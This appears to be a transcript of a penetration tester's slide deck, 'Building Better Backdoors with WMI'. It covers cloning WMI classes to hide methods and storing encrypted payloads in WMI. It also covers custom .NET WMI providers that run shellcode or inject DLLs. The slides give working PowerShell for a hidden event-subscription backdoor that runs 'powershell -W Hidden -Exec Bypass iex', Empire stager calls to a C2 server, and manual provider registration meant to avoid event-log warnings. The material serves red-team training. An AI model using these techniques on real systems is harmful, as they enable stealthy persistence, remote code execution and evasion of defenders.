This document discusses using Windows Management Instrumentation (WMI) to create fileless backdoors and persistent implants. It begins with an overview of WMI and its class structure. It then covers duplicating existing WMI classes to hide backdoor methods and storing payloads in WMI properties. The document also introduces creating custom WMI providers using .NET to implement backdoor functionality directly in WMI. It concludes by examining options for registering custom WMI providers, including manually registering through WMI calls to avoid event log warnings. In summary, the document explores abusing WMI's class inheritance and provider models to develop advanced fileless and persistent backdoors on Windows systems.

1. BUILDING BETTER BACKDOORS
WITH WMI

2. 2 Confidential & Proprietary
WHO AM I
 Alexander Polce Leary
 Senior Network & Application Pentester at NetSPI
 Twitter: 0xbadjuju
 KeyBase: 0xbadjuju
 Blogs: https://blog.netspi.com/author/aleary/
 Code: https://github.com/0xbadjuju/

3. 3 Confidential & Proprietary
OUTLINE
1. WMI Overview
2. Fileless Backdoors
3. WMI for Storage
4. WMI Providers
5. Installing WMI Providers
https://github.com/0xbadjuju/PowerProvider
https://github.com/0xbadjuju/WheresMyImplant

4. 4 Confidential & Proprietary
WHAT IS WMI?
 Windows Management Instrumentation
 Present since Windows 95
 It shows
 Probably familiar with some WMI functions
 Win32_Process -> Create()
 wmic.exe process call create …
 Invoke-WmiMethod –class win32_process –name create –argumentlist …

5. 5 Confidential & Proprietary
WMI OVERVIEW
 WMI
 Namespace
 Class
 Property
 Static || Dynamic
 Method
 WQL
 SELECT * from class;
 SQL Server
 Database
 Table
 Row
 Static
 Stored Procedure
 SQL
 SELECT * FROM table;

6. 6 Confidential & Proprietary6 Confidential & Proprietary
FILELESS BACKDOORS
INVOKE-WMIDUPLICATECLASS

7. 7 Confidential & Proprietary
WMI CLASS INHERITANCE
 WMI has a robust implementation of class inheritance
 CIM_ManagedSystemElement
 CIM_LogicalElement
 CIM_Process
 Win32_Process
 ???

8. 8 Confidential & Proprietary
DUPLICATING A WMI CLASS
$NewManagementClass = $ManagementClass.Derive($DerivedClassName)
$NewManagementClass.put()
$NewManagementClass = $ManagementClass.Clone($ClonedClassName)
$NewManagementClass.put()
https://twitter.com/mattifestation/status/907702749193633792

9. 9 Confidential & Proprietary
HIDING WMI METHODS
Invoke-WMIDuplicateClass
-TargetClassName Win32_Process
-DuplicateClassName Win32_Create
-ComputerName $ComputerName
-Credential $Credential

10. 10 Confidential & Proprietary

11. 11 Confidential & Proprietary
Binding
WMI FILELESS BACKDOORS
 EventFilter
 __EventFilter
 Consumers
 ComandLineEventConsumer
 ActiveScriptEventConsumer
 Binding
 __FilterToConsumberBinding
 Well Known and Documented Technique
 https://github.com/Sw4mpf0x/PowerLurk
 https://blog.netspi.com/
Event Filter
(Trigger)
Consumer
(Action)

12. 12 Confidential & Proprietary
EVENT FILTER + CONSUMER EXAMPLE
$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{
EventNamespace = 'root/cimv2'
Name = “NetSPI Event Filter”
Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'"
QueryLanguage = 'WQL’
};
$Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{
Name = “NetSPI Event Consumer”
CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…”
};
Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{
Filter = $Filter
Consumer = $Consumer
};

13. 13 Confidential & Proprietary
INVOKE-WMIDUPLICATECLASS
Invoke-WMIDuplicateClass -TargetClassName CommandLineEventConsumer -DuplicateClassName DerivedEventConsumer -NameSpace
ROOTSubscription ComputerName $ComputerName -Credential $Credential –Verbose
$Filter = Set-WmiInstance -Namespace rootsubscription -Class __EventFilter -Arguments @{
EventNamespace = 'rootcimv2'
Name = “NetSPI Event Filter”
Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'"
QueryLanguage = 'WQL’
};
$Consumer = Set-WmiInstance -Namespace rootsubscription -Class DerivedEventConsumer -Arguments @{
Name = “NetSPI Event Consumer”
CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…”
};
Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{
Filter = $Filter
Consumer = $Consumer
};

14. 14 Confidential & Proprietary

15. 15 Confidential & Proprietary15 Confidential & Proprietary
WMI FOR STORAGE
INVOKE-WMIFS

16. 16 Confidential & Proprietary
INVOKE-WMIFS
1. Create a WMI class to store file in
 New-WMIFSClass
2. Read in file and base64 encode and encrypt
 ConvertTo-Base64 & ConvertTo-EncryptedText
3. Slice the base64 encoded string and insert into WMI
 Invoke-InsertFileThreaded
4. Retrieve the file and reassemble
 Invoke-RetrieveFile
5. Base64, decrypt file, and optionally write to disk
 ConvertFrom-Base64 & ConvertFrom-EncryptedText
Wrapped into Invoke-WMIUpload & Invoke-WMIRemoteExtract

17. 17 Confidential & Proprietary

18. 18 Confidential & Proprietary18 Confidential & Proprietary
WMI PROVIDERS
WHERESMYIMPLANT

19. 19 Confidential & Proprietary
WMI PROVIDERS
 These are the DLL’s behind the scenes that do all the work
 Host the methods and properties that we call
 cimwin32.dll
 What about building our own provider?
 Build the provider
 Register the provider
 Access the provider

20. 20 Confidential & Proprietary
HOW TO CREATE A PROVIDER
 WmiPrvSe.exe can host the Common Language Runtime (CLR)
 Opens up .Net for use in WMI
 Add a few decorators to a class and your done
 [ManagementEntity]
 [ManagementTask]
https://gist.github.com/0xbadjuju/550fb602a8b7aa610436d533c94a1885

21. 21 Confidential & Proprietary
BASIC BACKDOOR
 Command Execution
 ShellCode Runner
 Dll Injector
 PE Injector
https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider
https://github.com/subTee/EvilWMIProvider

22. 22 Confidential & Proprietary

23. 23 Confidential & Proprietary
BASIC WMI BACKDOOR

24. 24 Confidential & Proprietary

25. 25 Confidential & Proprietary
BETTER WMI BACKDOOR
 Store Payload as Base64 Encoded String in WMI, and then inject the payload
 ShellCode Runner
 Dll Injector
 PE Injector

26. 26 Confidential & Proprietary
BETTER WMI BACKDOOR

27. 27 Confidential & Proprietary

28. 28 Confidential & Proprietary
WMI EMBEDDED EMPIRE?
Embedded Empire Stager? Why not?
$language = “powershell”
$server = “http://192.168.255.100:80”
$key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5”
Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key

29. 29 Confidential & Proprietary
EMPIRE – POWERSHELL AGENT

30. 30 Confidential & Proprietary

31. 31 Confidential & Proprietary
WMI EMBEDDED EMPIRE?
Embedded Empire Agent? Why not?
$language = “dotnet”
$server = “http://192.168.255.100:80”
$key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5”
Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key

32. 32 Confidential & Proprietary
EMPIRE - .NET AGENT

33. 33 Confidential & Proprietary33 Confidential & Proprietary
REGISTERING WMI PROVIDERS
INSTALL-WMIPROVIDER

34. 34 Confidential & Proprietary
INSTALLUTIL.EXE
PS C:> InstallUtil.exe assembly.dll
PS C:> InstallUtil.exe /u assembly.dll
In the Windows Event Log this triggers a warning.

35. 35 Confidential & Proprietary

36. 36 Confidential & Proprietary

37. 37 Confidential & Proprietary
.NET MANAGEDINSTALLERCLASS
PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper(
@( "C:assembly.dll")
)
PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper(
@(“/u”, "C:assembly.dll")
)
The PS version and .net assembly version need to match.
In the Windows Event Log this also triggers a warning.

38. 38 Confidential & Proprietary

39. 39 Confidential & Proprietary

40. 40 Confidential & Proprietary
MANUAL REGISTRATION
 What if we were to register the WMI Provider purely through WMI calls
 This does not come close to fitting on a slide
1. Create the WMI_extension Class
2. Create an instance of WMI_extension for the Win32_Implant Class
3. Create an instance of __InstanceProviderRegistration for WMI_extension
4. Create an instance of __MethodProviderRegistration for WMI_extension
5. Create the Win32_Implant Class
6. Register WMI_extension in HKCR and HKLM

41. 41 Confidential & Proprietary
MANUAL REGISTRATION
That looks hard

42. 42 Confidential & Proprietary
MANUAL REGISTRATION
It was

43. 43 Confidential & Proprietary
MANUAL REGISTRATION
Why would I want to do that?
 Manually registering a WMI provider allows us to bypass calling any executables on the remote
system
 Remember those pesky Windows Event Logs warnings?
 Those are caused by the default hosting model LocalSystemHost
 There are many, many others to choose from.
 Win32_Process -> Create() uses NetworkServiceHost
 Wanna guess that that HostingModel doesn’t do?

44. 44 Confidential & Proprietary
MANUAL REGISTRATION
Install-WMIProviderExtension
-ComputerName $ComputerName
-Credential $Credential
-RemoteLibraryLocation C:WindowsSystem32wbemWheresMyImplant.dll
-ProviderDisplayName Win32_Implant
-HostingModel NetworkServiceHost:CLR

45. 45 Confidential & Proprietary

46. 46 Confidential & Proprietary

47. 47 Confidential & Proprietary
Questions?